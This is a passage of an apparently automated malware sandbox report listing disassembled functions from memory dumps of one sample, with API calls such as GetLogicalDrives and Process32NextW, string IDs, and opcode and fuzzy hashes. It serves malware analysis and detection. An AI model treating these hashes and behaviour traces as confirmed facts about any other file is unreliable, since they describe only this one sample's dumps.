                                                              • Opcode ID: 995b0128f3176c5660df6de5353314bfdb9b44ac10c6cf0d24ff8e3be56e3a57
                                                              • Instruction ID: 0796fdf33c14b28e63dddab0ad83bdce82f5e57c63b871038094fc0a4eb0ef58
                                                              • Opcode Fuzzy Hash: 995b0128f3176c5660df6de5353314bfdb9b44ac10c6cf0d24ff8e3be56e3a57
                                                              • Instruction Fuzzy Hash: B35183EB25C221BDB12285416F18EFB5B2EF5D3730B31C826F80BD6682E3D94A4E5171
                                                              Function 075B013C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: cb69351d76fb159a4a6d5e67e722441847d356f3de5cedafc0ace3948e1f2d68
                                                              • Instruction ID: d7055cce33e307ff4e31a10a45b8404a6fe4f9b13f7c87ea88dc0cc740632275
                                                              • Opcode Fuzzy Hash: cb69351d76fb159a4a6d5e67e722441847d356f3de5cedafc0ace3948e1f2d68
                                                              • Instruction Fuzzy Hash: 4E4152EB25C1257D712284916F68EFB5B2EF5D7730B31C826F80BD6682E3994E4E1071
                                                              Function 07560028 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 2b66fcab38e31d46360186170584b69a2d5342f363079deb04df548a52d1c09a
                                                              • Instruction ID: d23039544592c3cba12d52cc1b0976c4fb16fff4bcf961a00aa6c9021d2521fd
                                                              • Opcode Fuzzy Hash: 2b66fcab38e31d46360186170584b69a2d5342f363079deb04df548a52d1c09a
                                                              • Instruction Fuzzy Hash: C2518EEB26C125BD710291426F28EFB6B2EF5C7730B718836F80BD7582E2954A4E5171
                                                              Function 0756000E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: de7d26fc69263d85892791b38690a75d6b0ddd5de3e545824612ba252000644a
                                                              • Instruction ID: 27282074a415ecf8dedb26ede254b92890dd58e9136c5bb0ec3bbec7d44ea8a2
                                                              • Opcode Fuzzy Hash: de7d26fc69263d85892791b38690a75d6b0ddd5de3e545824612ba252000644a
                                                              • Instruction Fuzzy Hash: 07418AEB26C125BD710291816F28EFB6B2EF5D7730B318C26F80BD7282E2954A4E5175
                                                              Function 0756001A Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 56ca164c3f4ac79a01fe4e7ad19a42f5d357c983116e4176f2c125dc4d97895d
                                                              • Instruction ID: d97e78d3c065aa1bf0804a35c7abfe81d8f3bec3e972a9545b6539b0ccc8a660
                                                              • Opcode Fuzzy Hash: 56ca164c3f4ac79a01fe4e7ad19a42f5d357c983116e4176f2c125dc4d97895d
                                                              • Instruction Fuzzy Hash: 74418DEB26C125BD710291816F28EFB6B2EF5C7730B318C26F80BD7282E2954A4E5171
                                                              Function 07560031 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 437fcbe242888c61e6e5f04fe83dc3a679fef20e3d88843655acf5f1aaa57d97
                                                              • Instruction ID: e667ab9f7b70bd70080793ca8c155d5e9d2a1af6f8b48f767e3a56ca7c953743
                                                              • Opcode Fuzzy Hash: 437fcbe242888c61e6e5f04fe83dc3a679fef20e3d88843655acf5f1aaa57d97
                                                              • Instruction Fuzzy Hash: 0E419CEB26C125BD710291816F28EFB6B2EF5D7730B718C36F80BD7182E2954A4E5171
                                                              Function 075B0163 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 46775c1f3b4a86be18cae80f111bcc503f50baa0662f4d2fdc91850351ea785d
                                                              • Instruction ID: 29f93ee8e5464b0feff99a5bc180337f47bccbad41bc81246dc8f159c5845e97
                                                              • Opcode Fuzzy Hash: 46775c1f3b4a86be18cae80f111bcc503f50baa0662f4d2fdc91850351ea785d
                                                              • Instruction Fuzzy Hash: 484162EB25C1257D712280416F58EFB572EF1D7730B30C826F80BD6682E3994A4E1171
                                                              Function 07560045 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 809735c0ed1867f8a765674bfcef93134e4afa889e3e90b20cbe4d12fb51fd8f
                                                              • Instruction ID: 69d7d0c5622dc0412fcd7b9bdbb3a89d9eb374031adba8da7bd3b171d7d7f6fe
                                                              • Opcode Fuzzy Hash: 809735c0ed1867f8a765674bfcef93134e4afa889e3e90b20cbe4d12fb51fd8f
                                                              • Instruction Fuzzy Hash: 32417DEB2AC125BD710291816F68EFB6B2EF5D7730B318C36F80BD7182E2954A4E5171
                                                              Function 07560055 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 250COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: c88e3f3cfbcb3c62cf939c5fff8925018038d060456b750d9d12883437814ab6
                                                              • Instruction ID: eb0c2c13112612e7b8c7a62c0808b1eb22df024f6995cad628a1670ab67b6b0e
                                                              • Opcode Fuzzy Hash: c88e3f3cfbcb3c62cf939c5fff8925018038d060456b750d9d12883437814ab6
                                                              • Instruction Fuzzy Hash: 104180EB26C125BE750291416F68EFB672EF5D7730B308C36F80BD7182E2954A4A5171
                                                              Function 075600CF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 1cfbf19fa82676268a16c3ecf3c3d80704d6b9506848852a7279a8aebf556dc8
                                                              • Instruction ID: 2d83bea47e5a4d242cb0849ad6526b3dd82fbfee24f0921365a64d70ee17c865
                                                              • Opcode Fuzzy Hash: 1cfbf19fa82676268a16c3ecf3c3d80704d6b9506848852a7279a8aebf556dc8
                                                              • Instruction Fuzzy Hash: 42416BEB26C125BD750291816F28EFB6B2EF5D7730B308C37F80BDB582E2954A4A5171
                                                              Function 0756008F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: e44840fdb763b3617b1b10be8443e58d3fc131646f9cb0b6ef165d40a5a69e37
                                                              • Instruction ID: 5ed5d31ecb8d4c6bc3a129859f9984849053944ce8a232fea1f08b23d01ddfa4
                                                              • Opcode Fuzzy Hash: e44840fdb763b3617b1b10be8443e58d3fc131646f9cb0b6ef165d40a5a69e37
                                                              • Instruction Fuzzy Hash: 6B41A1EB26C1257E750291812F68EFB6B2EF5D7730B308877F80BDB182E2954E4A5171
                                                              Function 07560077 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 6acc329d3a27bd21750b6fd11850c0a4b5347028e733b94ccd2adfe4047200f5
                                                              • Instruction ID: 92220e10bd4a22c08c4eeb5fca80437f6bad3e445423e3eab38f8370a5e89610
                                                              • Opcode Fuzzy Hash: 6acc329d3a27bd21750b6fd11850c0a4b5347028e733b94ccd2adfe4047200f5
                                                              • Instruction Fuzzy Hash: 024190EB26C125BD710291816F18EFB6B2EF5D7730B308C36F80BD7182E2A54E4A5171
                                                              Function 075600E8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: bbf53e1621194bf91060697ff0c67ad189fd487427316de5accc7d9087eb54a2
                                                              • Instruction ID: e7fa9400dd36535bd1b7808f198e2bcfd290800ce3f068de1a14339cd67edc42
                                                              • Opcode Fuzzy Hash: bbf53e1621194bf91060697ff0c67ad189fd487427316de5accc7d9087eb54a2
                                                              • Instruction Fuzzy Hash: 8741D3EB26C125BD750291416F68EFB2B2EF5C7730B308C27F80FD7182E2A54A4A5175
                                                              Function 075B0271 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 01a1e08ed263cad4207a24837cc43cb099f3f204b77093acbe03180e148a767b
                                                              • Instruction ID: 6196a3c8410cc0e7e6bb184ed458fe64128c385da03252735dcf9286018435d0
                                                              • Opcode Fuzzy Hash: 01a1e08ed263cad4207a24837cc43cb099f3f204b77093acbe03180e148a767b
                                                              • Instruction Fuzzy Hash: 80318EEB25C2257D712285916F18EFB9B2EF1D7730B308836F80BD6682E3C94A4E5071
                                                              Function 075B0210 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 2e9ae52b41c5b98310329bca6c253dadb2a85b7b0e8b9afb0d81784acff6974d
                                                              • Instruction ID: 6b6618e011c6aa7398c33fb4ce5e19deb57b2617cd1e873f75c39828e2c446ed
                                                              • Opcode Fuzzy Hash: 2e9ae52b41c5b98310329bca6c253dadb2a85b7b0e8b9afb0d81784acff6974d
                                                              • Instruction Fuzzy Hash: C6316DEB25C2257D712285816F58EFB9B6EF5D7730B308836F80BD6682E3C94A4E5071
                                                              Function 07560103 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 36ae4f0c0d51be62f13585f2916322bb76ca7e90ffe0e0bfd96750512c722c7c
                                                              • Instruction ID: 39b9f458422d10cfb06ddc2183d4624d8b2b327682f21b6498620929cf73196d
                                                              • Opcode Fuzzy Hash: 36ae4f0c0d51be62f13585f2916322bb76ca7e90ffe0e0bfd96750512c722c7c
                                                              • Instruction Fuzzy Hash: 373119EB26C115BE610281816F58EFB6B2EF9D7731B308C76F40FD71C2E2954A4A5171
                                                              Function 07560115 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: b22da15ba008ff5552153b5b1a27f4d85ad0ed0275a4530bb790fd7e340b2440
                                                              • Instruction ID: 02eb086878cf6786b886770644e47062034e8348c870252103176c9da8947d06
                                                              • Opcode Fuzzy Hash: b22da15ba008ff5552153b5b1a27f4d85ad0ed0275a4530bb790fd7e340b2440
                                                              • Instruction Fuzzy Hash: 4A4136FB25C115BE620381816F58EFA2B2EF9C7730B308C76F40BDB2C2E2954A4A5171
                                                              Function 07560340 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07560397
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 4c6ba36461c75551176243c651fb403d70b5e7a0eb566ecd888b23f94951b0b1
                                                              • Instruction ID: 6bdc7b3a8507689019875b62ffbc3acf9ee041aeb680457b4dac25719e3596f0
                                                              • Opcode Fuzzy Hash: 4c6ba36461c75551176243c651fb403d70b5e7a0eb566ecd888b23f94951b0b1
                                                              • Instruction Fuzzy Hash: 883112EB6AC215BE62528185574CEF66A6EF6D7232B308C72F40BD36C2F2D44F485132
                                                              Function 075B024E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 952d96d712512639747b96651566ac302aac286790c20e93584231aed0ef7e2e
                                                              • Instruction ID: 753dacecd9003ef975eafb9086d868f82a791bf01795a4714314776019ec02d4
                                                              • Opcode Fuzzy Hash: 952d96d712512639747b96651566ac302aac286790c20e93584231aed0ef7e2e
                                                              • Instruction Fuzzy Hash: 7731E2EB15C2617EB22281516F58EFBAB2EF5D7630B308866F80AD6582E3C54E4E4131
                                                              Function 07560155 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 09f0e5d1e752f011936409fd0126c3075d72a9deacd223f6a70e8fb94d5248c3
                                                              • Instruction ID: 1ec176b5d659a5aedd6dbd444c65dfb72e9604717bdf0fbc0e218107a483d009
                                                              • Opcode Fuzzy Hash: 09f0e5d1e752f011936409fd0126c3075d72a9deacd223f6a70e8fb94d5248c3
                                                              • Instruction Fuzzy Hash: C431D4EB26C115BE650281816F58EFB6B2EF9D7730B308C36F40FD72C2E2A54A4A5171
                                                              Function 0756016D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: c24679aaa19bc4409e617a2a9ccc54703c209981b191ba2893bf8d67d4ff7962
                                                              • Instruction ID: ab3000c1920b3b02d263926d9ad206a0bab4de091d30e49e3a7786168bde01c6
                                                              • Opcode Fuzzy Hash: c24679aaa19bc4409e617a2a9ccc54703c209981b191ba2893bf8d67d4ff7962
                                                              • Instruction Fuzzy Hash: 9D31C1EB26C115BE750281816F58EFB6B6EF9D7730B308826F40FD7282E2A50A4A5135
                                                              Function 07560182 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 01d1c1b6cc5c592397cabffa86b96db59ebb0df6729392cffd9e3cb8408ecc31
                                                              • Instruction ID: 8e673a4e4870cc40e8722a79cd3b7eae72be5c390f6df47ae3dce93a25ac4e81
                                                              • Opcode Fuzzy Hash: 01d1c1b6cc5c592397cabffa86b96db59ebb0df6729392cffd9e3cb8408ecc31
                                                              • Instruction Fuzzy Hash: 2B31D5EB25C115BE650281816F58EFB6B6EFAD7730B308872F40FD72C2E2A50A4A5131
                                                              Function 075601F7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: b5d46f70eccafd33e37a5da87b04b7652ee547d8ccaed9bf7708dd1101ed660f
                                                              • Instruction ID: 8d4d6db7edb02bb53811b33936782947836e120782b82790c68dbfd0fcdc793a
                                                              • Opcode Fuzzy Hash: b5d46f70eccafd33e37a5da87b04b7652ee547d8ccaed9bf7708dd1101ed660f
                                                              • Instruction Fuzzy Hash: C331D6EB25C115BE650281816F58EFA6B2EFAD7731B308C63F40FD72C1E2A50A4A5171
                                                              Function 075601A7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 10c5594b935370a9c7075c2509725460d8e970a71e8f9c3ebbb4a4a2b9064c8c
                                                              • Instruction ID: 2951daf605ebc2aa589017b202d8229265a4b4f3e27f5f8e37c19ec25faca2fa
                                                              • Opcode Fuzzy Hash: 10c5594b935370a9c7075c2509725460d8e970a71e8f9c3ebbb4a4a2b9064c8c
                                                              • Instruction Fuzzy Hash: BE31F8EB25C115BFA60281809B58EFA6B6EFAD7730B308866F40FD72C1D2950A4A5631
                                                              Function 07560225 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 38039dca877d89c6cb82343cb3c7625df16e900a5968229547d5e587b6512eb5
                                                              • Instruction ID: 01a7d172fd66d00100917f68362e7e7a940e6e4488cb02f9eef55d349782378a
                                                              • Opcode Fuzzy Hash: 38039dca877d89c6cb82343cb3c7625df16e900a5968229547d5e587b6512eb5
                                                              • Instruction Fuzzy Hash: 792103EB25C125BE66028180AB1CEFB6B2EF9D7331B308872F40FD7281E2D50A4A5131
                                                              Function 075601D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 37a43564e838f31c794a2264ef8cd9a4410d5ad76b9afaae00d248b11d487e56
                                                              • Instruction ID: 07ffb77e44b288dffb3c64fd65646955a8a3bc82576c703693a0841b9619ac3e
                                                              • Opcode Fuzzy Hash: 37a43564e838f31c794a2264ef8cd9a4410d5ad76b9afaae00d248b11d487e56
                                                              • Instruction Fuzzy Hash: 6B21F7EB25C115BEA60281816B58EFA6B2EFAD7731B308876F40FD72C2D2D50A4A5135
                                                              Function 0756020F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 8cbf47a7303a825230e8d32f0bfa84eb712f9f060add834f0e5d2cd23f8c861e
                                                              • Instruction ID: 2a65108c7c7e694df441139e3024d621ebcfc92815922a9de5931b1f78f11d57
                                                              • Opcode Fuzzy Hash: 8cbf47a7303a825230e8d32f0bfa84eb712f9f060add834f0e5d2cd23f8c861e
                                                              • Instruction Fuzzy Hash: A421F6EB25C115BE650391816B58EF66B6EF9D7331B308872F40FD7282D2D50A4A5135
                                                              Function 075B0329 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID: aZXP
                                                              • API String ID: 1850201408-3618135372
                                                              • Opcode ID: 2f94b39d1be79eb2c267d2572917ef8b9ae297a92722e5d982065a092d2fca99
                                                              • Instruction ID: f7e3ee11ae3b0dc4cdfd274b2d71dc25e771780100f7e2da38242a17b908aab2
                                                              • Opcode Fuzzy Hash: 2f94b39d1be79eb2c267d2572917ef8b9ae297a92722e5d982065a092d2fca99
                                                              • Instruction Fuzzy Hash: 031160EB29D2657E712385A12F58DFB9B2EF4C36707308936F80BD2682E2C44A4E1031
                                                              Function 07560247 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 5bd659eaec2577fda0d9b95dcf2e94e10dfb8677c9ccfa109656706ab368aa4b
                                                              • Instruction ID: b1403c5542b6411d0414b29bd940d381f93c29a022bff0a14832a9fee42f6754
                                                              • Opcode Fuzzy Hash: 5bd659eaec2577fda0d9b95dcf2e94e10dfb8677c9ccfa109656706ab368aa4b
                                                              • Instruction Fuzzy Hash: B111DAEB25D1157E760391816B58EFA6B6EF9D33317308876F40BD7182D2D40A4E6136
                                                              Function 0756025D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
